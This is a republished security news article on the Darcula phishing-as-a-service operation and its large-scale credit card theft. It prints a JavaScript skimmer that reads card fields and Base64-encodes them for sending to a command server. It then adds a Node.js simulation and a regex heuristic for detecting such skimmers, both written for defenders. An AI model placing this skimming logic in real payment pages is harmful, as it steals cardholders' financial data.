Darcula (PhaaS) stole 884,000 credit card details; over 13 million clicks from users worldwide
Security researchers have uncovered a large phishing platform named "Darcula" that, through carefully crafted phishing attacks, stole roughly 884,000 credit card details from victims in 32 countries, causing estimated losses of more than $150 million. The platform runs on a subscription model, supplies convincing website replicas with SSL/TLS certificates, can bypass multi-factor authentication, and spreads malicious links over multiple channels, making it one of the most sophisticated credit card theft campaigns of recent years. 2025-5-6 08:49:17 Author: cybersecuritynews.com (view original)

Darcula (PhaaS) Stole 884,000 Credit Card Details Through 13 Million Clicks from Users Worldwide

Security researchers have uncovered one of the largest credit card theft operations in recent history, with a sophisticated Phishing-as-a-Service (PhaaS) platform called “Darcula” responsible for stealing approximately 884,000 credit card details through a massive campaign that generated over 13 million clicks from unsuspecting users worldwide.

The operation, which began in late 2024, has targeted consumers across 32 countries, with the highest concentration of victims in North America and Europe.

Security experts estimate the financial damage could exceed $150 million based on current dark web values for stolen financial data.


The Darcula platform distinguishes itself from typical phishing operations through its advanced infrastructure and subscription-based model, allowing even low-skilled cybercriminals to launch sophisticated attacks.

The service provides customers with convincing replicas of banking websites, e-commerce platforms, and payment portals, complete with valid SSL/TLS certificates and look-alike domain names designed to evade detection.

Most concerning is Darcula's ability to bypass multi-factor authentication through real-time relay (adversary-in-the-middle) techniques: the phishing page captures the one-time code the victim types and forwards it to the genuine site before it expires, so the attacker ends up with an authenticated session rather than just a password.

The massive campaign’s success stems from its multi-channel approach, delivering malicious links through email, SMS, social media messaging, and compromised advertising networks.

Victims typically receive urgent messages claiming issues with their accounts or purchases, directing them to fraudulent sites that capture their credentials and payment information.

The operation’s scale suggests a well-organized cybercriminal syndicate with significant resources and technical expertise behind it.

Mnemonic analysts identified the Darcula operation in February 2025 after tracing a pattern of credit card theft reported by financial institutions.

The researchers discovered a command-and-control infrastructure spanning multiple countries, with primary servers located in Eastern Europe and Southeast Asia.

“What makes Darcula particularly dangerous is its modular architecture and constant evolution,” explained Dr. Elena Vasquez, lead cybersecurity researcher at Mnemonic. “The operators continuously update their techniques to evade detection.”

The most sophisticated aspect of Darcula is its advanced infection mechanism, which employs a multi-stage payload delivery system to evade security solutions.

Initial access

Initial access begins with seemingly innocuous JavaScript code embedded in fake payment pages:

function validateInput() {
  // Legitimate-looking form validation; collectCardData() belongs to the kit
  // and is not reproduced in the report
  collectCardData();
  // Hidden step that performs the actual theft, delayed by half a second so the
  // page has already behaved like a normal form submission
  setTimeout(function() {
    let exfiltrationPayload = {
      cardNum: document.getElementById('ccnumber').value,
      expDate: document.getElementById('expdate').value,
      cvv: document.getElementById('cvv').value,
      name: document.getElementById('cardholder').value
    };
    // btoa() only Base64-encodes the JSON (obfuscation, not encryption);
    // sendToC2() is the kit's transport helper and is not shown
    sendToC2(btoa(JSON.stringify(exfiltrationPayload)));
  }, 500);
  return true;
}

When users enter their information into these convincing forgeries, the JavaScript captures the data and encodes it before transmission to intermediate servers. Note that in the snippet above the only transformation is btoa(), i.e. Base64: it hides the card data from a casual glance at the request but is trivially reversible, so anyone inspecting the outbound traffic can read the stolen fields in full.
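To make the capture-encode-exfiltrate pattern concrete, the following Node.js example (added here; it is neither code from the report nor from the Darcula kit) simulates the skimmer against a stand-in DOM, shows that the Base64 "wire" payload decodes straight back to the card data, and then runs a small static heuristic over two constructed scripts to flag the skimmer shape. The field ids and the sendToC2 name come from the snippet above; the sample card values, the benign comparison script and the scoring thresholds are assumptions made for this example.

```javascript
// Added example: simulates the skimming pattern shown above and scores scripts
// for it. Not from the cybersecuritynews.com report or the Darcula kit.

// Minimal stand-in for the browser DOM: only getElementById() is needed.
function makeFakeDocument(fields) {
  return {
    getElementById(id) {
      if (!(id in fields)) throw new Error(`no element with id ${id}`);
      return { value: fields[id] };
    },
  };
}

// Mirrors what the skimmer's timer callback assembles from the form.
function buildExfilPayload(doc) {
  return {
    cardNum: doc.getElementById('ccnumber').value,
    expDate: doc.getElementById('expdate').value,
    cvv: doc.getElementById('cvv').value,
    name: doc.getElementById('cardholder').value,
  };
}

// The snippet wraps the JSON in btoa(): Base64 is an encoding, not encryption.
function encodeForC2(payload) {
  return Buffer.from(JSON.stringify(payload), 'utf8').toString('base64');
}

// Anyone who can read the outbound request body (proxy, EDR, packet capture)
// recovers the cardholder data with a single decode step.
function decodeC2Payload(b64) {
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Static heuristic: a script that reads several card fields, serialises or
// encodes them, and has an outbound call. Thresholds are assumptions.
const CARD_FIELD_RE = /getElementById\(\s*['"](ccnumber|cvv|expdate|cardholder)['"]\s*\)/gi;
const ENCODE_RE = /\b(btoa|JSON\.stringify)\s*\(/;
const EXFIL_RE = /\b(sendToC2|fetch|XMLHttpRequest|sendBeacon)\b/;

function scoreSkimmerIndicators(src) {
  const fieldReads = new Set(
    [...src.matchAll(CARD_FIELD_RE)].map((m) => m[1].toLowerCase())
  );
  const indicators = {
    readsCvv: fieldReads.has('cvv'),
    readsMultipleCardFields: fieldReads.size >= 3,
    serialisesOrEncodes: ENCODE_RE.test(src),
    sendsOut: EXFIL_RE.test(src),
    delayedViaTimer: /\bsetTimeout\s*\(/.test(src),
  };
  const score = Object.values(indicators).filter(Boolean).length;
  return { score, indicators, suspicious: score >= 4 };
}

// Constructed sample input: a well-known test card number, not a real one.
const SAMPLE_FORM = {
  ccnumber: '4111111111111111',
  expdate: '12/29',
  cvv: '123',
  cardholder: 'J. Doe',
};

// Constructed scripts: one with the skimmer shape, one doing honest validation.
const SUSPECT_SCRIPT = `
function validateInput() {
  setTimeout(function () {
    let p = {
      cardNum: document.getElementById('ccnumber').value,
      cvv: document.getElementById('cvv').value,
      expDate: document.getElementById('expdate').value
    };
    sendToC2(btoa(JSON.stringify(p)));
  }, 500);
  return true;
}`;

const BENIGN_SCRIPT = `
function validateInput() {
  const n = document.getElementById('ccnumber').value.replace(/\\s+/g, '');
  return /^\\d{13,19}$/.test(n);
}`;

function demo() {
  const wire = encodeForC2(buildExfilPayload(makeFakeDocument(SAMPLE_FORM)));
  return {
    wire,
    recovered: decodeC2Payload(wire),
    suspectVerdict: scoreSkimmerIndicators(SUSPECT_SCRIPT),
    benignVerdict: scoreSkimmerIndicators(BENIGN_SCRIPT),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node skimmer-demo.js`. The decoded `recovered` object is identical to the form input, which is the practical point for defenders: a proxy or EDR rule that Base64-decodes POST bodies to unknown hosts will see card numbers in clear. The scoring function is deliberately crude; in a real deployment the field-id list and outbound-call list would be tuned to the merchant's own pages, and the verdict would feed a review queue rather than a block.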

These servers, often compromised legitimate websites, relay the information through a series of proxies before reaching Darcula’s secure storage infrastructure.

This multi-hop architecture makes attribution extremely difficult for law enforcement.

Financial institutions and cybersecurity companies have formed a joint task force to combat the Darcula threat.

They recommend organizations implement advanced phishing detection systems and conduct regular security awareness training for employees and customers.

Individuals should verify website authenticity through official channels before entering sensitive information and enable transaction notifications to quickly identify unauthorized charges.

Law enforcement agencies across multiple jurisdictions are coordinating efforts to track down the Darcula operators, though they acknowledge the sophisticated nature of the operation presents significant challenges to attribution and prosecution.



Source: https://cybersecuritynews.com/darcula-phaas-stolen-884000-credit-card-details/
For infringement complaints contact: admin#unsafe.sh